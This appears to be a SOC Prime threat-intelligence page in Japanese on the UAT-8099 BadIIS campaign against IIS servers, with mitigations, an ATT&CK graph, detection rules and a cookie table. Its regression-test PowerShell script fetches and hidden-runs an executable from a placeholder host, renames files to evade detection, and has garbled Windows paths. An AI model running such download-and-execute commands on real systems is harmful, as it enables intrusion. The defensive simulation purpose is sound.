SOC Prime Bias: クリティカル

02 2月 2026 14:31

Cisco Talosブログ

UAT-8099の解剖: 新しい永続化メカニズムと地域特化型攻撃

Ruslan Mikhalov SOC Primeの脅威リサーチ責任者

フォローする

Detection stack

AIDR
Alert
ETL
Query

脅威レポート
攻撃フロー
検出
シミュレーション

概要

Cisco Talosは、アジア全域の脆弱なIISウェブサーバーを標的とした新しいUAT-8099キャンペーンを報告しています。このアクターは地域識別子を含むカスタマイズされたBadIISバリアントを展開し、ウェブシェル、PowerShell、GotoHTTPリモートコントロールツールに依存して後続の制御を行います。永続性は、隠しローカルアカウントの作成と管理者活動に溶け込むための正当なレッドチームユーティリティの使用を含むように拡大しました。このトレードクラフトは、以前のWEBJACK操作と重なり、タイとベトナムのサイトに影響を及ぼすSEO詐欺に焦点を当てているようです。

調査

Talosは、DNSテレメトリ、ファイルハッシュ、悪意のあるスクリプトを確認して、侵入の連鎖を再構築しました。アナリストは、SoftEther VPNやEasyTierのようなツールと組み合わせたウェブシェル、Sharp4RemoveLog、CnCrypt Protect、OpenArk64、GotoHTTPを含む一連のカスタムユーティリティを観察しました。IISHijackとasdSearchEngineという地域調整された2つのBadIIS亜種がリバースエンジニアリングされ、ハードコーディングされた国コード、選択的リクエストフィルタリング、XOR暗号化されたC2設定が明らかにされました。VirusTotal上で一致するC2ドメインを持つBadIISのELFビルドも特定されました。

緩和策

公開されたIISの脆弱性を修正し、ウェブアプリケーションファイアウォールの強制を強化し、隠されたローカルアカウント（例: admin$、mysql$など）の作成を監視します。GotoHTTPをダウンロードまたは起動するPowerShellの活動を検出し、既知のC2ドメインへの外部通信をブロックします。特定されたカスタムユーティリティの実行とウェブサーバーディレクトリ内の予期しない変更について、エンドポイント制御を使用して警告します。

対応

インジケーターが発見された場合、サーバーを隔離し、ウェブシェルを削除し、隠しアカウントを削除します。フォレンジック分析のためにBadIISバイナリと関連スクリプトを保存し、C2活動を特定するために完全なネットワークトラフィックのレビューを行います。信頼できる既知のバックアップから復元し、IIS設定を再強化して再感染を防止します。

“graph TB %% クラス定義 classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 %% ノード定義 action_exploit_public_facing[“アクション – T1190 公開前面アプリケーションのエクスプロイト 説明: インターネット向けアプリケーションの脆弱性を利用して最初のアクセスを得る。 詳細: 既知の脆弱性を介してIISサーバーを侵害し、ウェブシェルを展開する。”] class action_exploit_public_facing action tool_web_shell[“ツール – 名前: ウェブシェル 説明: リモートコマンド実行を可能にするサーバーサイドスクリプト。”] class tool_web_shell tool action_powershell_execution[“アクション – T1059.001 PowerShell 説明: PowerShellを使用してコマンドやペイロードを実行する。 コマンド: whoami、tasklist、ツールのダウンロード。”] class action_powershell_execution action tool_powershell[“ツール – 名前: PowerShell 説明: Windowsのコマンドラインシェルとスクリプト言語。”] class tool_powershell tool action_system_info_discovery[“アクション – T1082 システム情報の発見 説明: OSとハードウェア構成を収集する。 コマンド: システム情報収集、ユーザーコンテキストログ。”] class action_system_info_discovery action action_create_account[“アクション – T1136 アカウント作成 説明: 継続性のために隠されたローカルアカウントを作成する。”] class action_create_account action action_valid_accounts[“アクション – T1078 有効なアカウント 説明: 継続的なアクセスと特権昇格のために作成されたアカウントを使用する。”] class action_valid_accounts action action_clear_event_logs[“アクション – T1070.001 Windowsイベントログの消去 説明: アクティビティを隠すためにログを削除する。 ツール: Sharp4RemoveLogユーティリティ。”] class action_clear_event_logs action tool_sharp4removelog[“ツール – 名前: Sharp4RemoveLog 説明: Windowsイベントログを削除するユーティリティ。”] class tool_sharp4removelog tool action_disable_event_logging[“アクション – T1562.002 Windowsイベントロギングの無効化 説明: ロギングをオフにして防御を弱める。”] class action_disable_event_logging action action_obfuscate_files[“アクション – T1027 ファイルまたは情報の難読化 説明: C2設定とHTMLテンプレートを隠すためにXOR暗号化を使用する（キー0x7A）。”] class action_obfuscate_files action malware_badiis[“マルウェア – 名前: BadIIS 説明: XOR難読化を用いるバリアント。”] class malware_badiis malware action_lateral_tool_transfer[“アクション – T1570 横方向のツール転送 説明: 被害者環境にツールやファイルを転送する。 ツール: BadIISバイナリ、GotoHTTP、SoftEther VPN、EasyTier。”] class action_lateral_tool_transfer action tool_gotohttp[“ツール – 名前: GotoHTTP 説明: HTTP/HTTPSを介してファイルを転送する。”] class tool_gotohttp tool tool_softether[“ツール – 名前: SoftEther VPN 説明: トラフィックをトンネリングするための多段プロキシ。”] class tool_softether tool tool_easytier[“ツール – 名前: EasyTier 説明: トラフィックをトンネリングするための多段プロキシ。”] class tool_easytier tool action_proxy_multi_hop[“アクション – T1090.003 プロキシ多段プロキシ 説明: トラフィックの発信元を隠すためにプロキシツールを使用する。”] class action_proxy_multi_hop action action_web_protocol_c2[“アクション – T1071.001 ウェブプロトコル 説明: HTTP/HTTPSを使ってGotoHTTPでC2を通信する。”] class action_web_protocol_c2 action %% フローを示す接続 action_exploit_public_facing u002du002d>|uses| tool_web_shell tool_web_shell u002du002d>|enables| action_powershell_execution action_powershell_execution u002du002d>|uses| tool_powershell tool_powershell u002du002d>|executes| action_system_info_discovery action_system_info_discovery u002du002d>|leads to| action_create_account action_create_account u002du002d>|enables| action_valid_accounts action_valid_accounts u002du002d>|uses| action_clear_event_logs action_clear_event_logs u002du002d>|uses| tool_sharp4removelog action_clear_event_logs u002du002d>|also| action_disable_event_logging action_disable_event_logging u002du002d>|precedes| action_obfuscate_files action_obfuscate_files u002du002d>|implemented by| malware_badiis malware_badiis u002du002d>|facilitates| action_lateral_tool_transfer action_lateral_tool_transfer u002du002d>|transfers| tool_gotohttp action_lateral_tool_transfer u002du002d>|transfers| tool_softether action_lateral_tool_transfer u002du002d>|transfers| tool_easytier tool_softether u002du002d>|used for| action_proxy_multi_hop tool_easytier u002du002d>|used for| action_proxy_multi_hop action_proxy_multi_hop u002du002d>|supports| action_web_protocol_c2 tool_gotohttp u002du002d>|used in| action_web_protocol_c2 “

攻撃フロー

検出

PowerShellを使用したダウンロードまたはアップロード（コマンドライン経由）

SOC Primeチーム

2026年1月30日

表示

公開ユーザープロファイル内の不審なファイル（ファイルイベント経由）

SOC Primeチーム

2026年1月30日

表示

アカウントまたはグループの列挙の可能性（コマンドライン経由）

SOC Primeチーム

2026年1月30日

表示

GotoHTTP展開用のPowerShellコマンド実行の検出 [Windows PowerShell]

SOC Prime AIルール

2026年1月30日

表示

SEO詐欺を目的にIISサーバーを標的とするBadIISマルウェアの検出 [Webサーバー]

SOC Prime AIルール

2026年1月30日

表示

シミュレーション実行

前提条件：テレメトリーとベースラインプレフライトチェックを通貨していること。

攻撃の流れとコマンド:
攻撃者が侵 compromisedされたウェブサーバーに初期の足掛かりを得た。この攻撃者は、IISウェブルートの下に bad_iis という名前の隠しディレクトリを作成し、特注の名前を持つウェブシェルバイナリを配置します。 shell_xyz.exe （文字列「ウェブシェル」を避けます）。このシェルを使用して、後でGotoHTTPバイナリをダウンロードするPowerShellペイロードを横方向に実行し、それを svc_update.exeにリネームして実行します。イメージ名が難読化されているため、元のルールの Image|contains チェックが回避されますが、コマンドラインには「PowerShell」が含まれています。

回帰テストスクリプト: このスクリプトは、記述されたステップを再現し、BadIIS攻撃に似たテレメトリーを生成しますがなくルールが監視している具体的な文字列を使用しています。

# BadIISシミュレーション — 難読化バージョン
$webRoot = "C:inetpubwwwroot"
$payloadDir = Join-Path $webRoot "bad_iis"
New-Item -Path $payloadDir -ItemType Directory -Force | Out-Null

# リネームされたウェブシェル（既知の良性exeのバイナリコピー）のデプロイ
$shellSrc = "$env:SystemRootSystem32notepad.exe"
$shellDst = Join-Path $payloadDir "shell_xyz.exe"
Copy-Item -Path $shellSrc -Destination $shellDst -Force

# ウェブシェルがPowerShellを呼び出してGotoHTTPをダウンロードすることをシミュレート
$gotoUrl = "http://malicious.example.com/GotoHTTP.exe"
$gotoDst = "C:WindowsTempsvc_update.exe"

$psCommand = @"
Invoke-WebRequest -Uri '$gotoUrl' -OutFile '$gotoDst';
Start-Process -FilePath '$gotoDst' -WindowStyle Hidden;
"@

# リネームされたウェブシェル経由でPowerShellペイロードを実行（プロセス作成）
Start-Process -FilePath $shellDst -ArgumentList "/c powershell.exe -NoProfile -ExecutionPolicy Bypass -Command `$psCommand`" -WindowStyle Hidden

Write-Output "BadIISシミュレーションが実行されました。"

クリーンアップコマンド: 配置されたアーティファクトを削除し、環境を復元します。

# BadIISシミュレーションアーティファクトのクリーンアップ
$webRoot = "C:inetpubwwwroot"
$payloadDir = Join-Path $webRoot "bad_iis"
Remove-Item -Path $payloadDir -Recurse -Force -ErrorAction SilentlyContinue

$gotoDst = "C:WindowsTempsvc_update.exe"
Remove-Item -Path $gotoDst -Force -ErrorAction SilentlyContinue

Write-Output "クリーンアップ完了。"

SOC PrimeのDetection as Codeプラットフォームに参加し ビジネスに最も関連性のある脅威に対する可視性を向上させましょう。開始して即座に価値をもたらすためには、今すぐSOC Primeの専門家とのミーティングを予約してください。

無料で参加

Name	Descripiton
PHPSESSID	Preserves user session state across page requests. Cookie generated by applications based on the PHP language. This is a general purpose identifier used to maintain user session variables. It is normally a random generated number, how it is used can be specific to the site, but a good example is maintaining a logged-in status for a user between pages.
sp_i	Used to store information about authenticated User.
sp_r	Used to store information about authenticated User.
sp_a	Used to store information about authenticated User.

Name	Descripiton
tuuid	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
tuuid_last_update	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
um	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
umeh	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
na_sc_x	Used by the social sharing platform AddThis to keep a record of parts of the site that has been visited in order to recommend other parts of the site.
APID	Collects anonymous data related to the user's visits to the website.
IDSYNC	Collects anonymous data related to the user's visits to the website.
_cc_aud	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
_cc_cc	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
_cc_dc	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
_cc_id	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
dpm	Via a unique ID that is used for semantic content analysis, the user's navigation on the website is registered and linked to offline data from surveys and similar registrations to display targeted ads.
acs	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded, with the purpose of displaying targeted ads.
clid	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded, with the purpose of displaying targeted ads.
KRTBCOOKIE_#	Registers a unique ID that identifies the user's device during return visits across websites that use the same ad network. The ID is used to allow targeted ads.
PUBMDCID	Registers a unique ID that identifies the user's device during return visits across websites that use the same ad network. The ID is used to allow targeted ads.
PugT	Registers a unique ID that identifies the user's device during return visits across websites that use the same ad network. The ID is used to allow targeted ads.
ssi	Registers a unique ID that identifies a returning user's device. The ID is used for targeted ads.
_tmid	Registers a unique ID that identifies the user's device upon return visits. The ID is used to target ads in video clips.
wam-sync	Used by the advertising platform Weborama to determine the visitor's interests based on pages visits, content clicked and other actions on the website.
wui	Used by the advertising platform Weborama to determine the visitor's interests based on pages visits, content clicked and other actions on the website.
AFFICHE_W	Used by the advertising platform Weborama to determine the visitor's interests based on pages visits, content clicked and other actions on the website.
B	Collects anonymous data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The registered data is used to categorise the users' interest and demographical profiles with the purpose of customising the website content depending on the visitor.
1P_JAR	These cookies are used to gather website statistics, and track conversion rates.
APISID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
HSID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
NID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
SAPISID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
SID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
SIDCC	Security cookie to protect users data from unauthorised access.
SSID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
__utmx	This cookie is associated with Google Website Optimizer, a tool designed to help site owners improve their wbesites. It is used to distinguish between two varaitions a webpage that might be shown to a visitor as part of an A/B split test. This helps site owners to detemine which version of a page performs better, and therefore helps to improve the website.
__utmxx	This cookie is associated with Google Website Optimizer, a tool designed to help site owners improve their wbesites. It is used to distinguish between two varaitions a webpage that might be shown to a visitor as part of an A/B split test. This helps site owners to detemine which version of a page performs better, and therefore helps to improve the website.

Name	Descripiton
_hjid	Hotjar cookie. This cookie is set when the customer first lands on a page with the Hotjar script. It is used to persist the random user ID, unique to that site on the browser. This ensures that behavior in subsequent visits to the same site will be attributed to the same user ID.
_hjIncludedInSample	This cookie is associated with web analytics functionality and services from Hot Jar, a Malta based company. It uniquely identifies a visitor during a single browser session and indicates they are included in an audience sample.
intercom-id-[xxx]	This cookie is used by Intercom as a session so that users can continue a chat as they move through the site.
intercom-session-[xxx]	Used to keeping track of sessions and remember logins and conversations.
demdex	Via a unique ID that is used for semantic content analysis, the user's navigation on the website is registered and linked to offline data from surveys and similar registrations to display targeted ads.
CookieConsent	Stores the user's cookie consent state for the current domain.
__cfduid	Used by the content network, Cloudflare, to identify trusted web traffic.
ss	These cookies enable the website to provide enhanced functionality and personalisation . They may be set by us or by third party providers whose services we have added to our pages. These services may include the Live Chat facility, Contact Us form(s), the Product Quotation forms and submission process, and the Email Newsletter sign up functionality .

Name	Descripiton
_ga	This cookie name is asssociated with Google Universal Analytics - which is a significant update to Google's more commonly used analytics service. This cookie is used to distinguish unique users by assigning a randomly generated number as a client identifier. It is included in each page. Registers a unique ID that is used to generate statistical data on how the visitor uses the website. request in a site and used to calculate visitor, session and campaign data for the sites analytics reports. By default it is set to expire after 2 years, although this is customisable by website owners.
_gat	Used by Google Analytics to throttle request rate. This cookie name is associated with Google Universal Analytics, according to documentation it is used to throttle the request rate - limiting the collection of data on high traffic sites. It expires after 10 minutes.
_gid	This cookie name is asssociated with Google Universal Analytics. This appears to be a new cookie and as of Spring 2017 no information is available from Google. It appears to store and update a unique value for each page visited. Registers a unique ID that is used to generate statistical data on how the visitor uses the website.
IDE	Used by Google DoubleClick to register and report the website user's actions after viewing or clicking one of the advertiser's ads with the purpose of measuring the efficacy of an ad and to present targeted ads to the user.
r/collect	Used by Google DoubleClick to register and report the website user's actions after viewing or clicking one of the advertiser's ads with the purpose of measuring the efficacy of an ad and to present targeted ads to the user.
test_cookie	Used to check if the user's browser supports cookies.
collect	Used to send data to Google Analytics about the visitor's device and behaviour. Tracks the visitor across devices and marketing channels.
ads/user-lists/#	These cookies may be set through our site by our advertising partners. They may be used by those companies to build a profile of your interests and show you relevant adverts on other sites.
c	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
khaos	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
put_#	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
rpb	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
rpx	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
tap.php	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.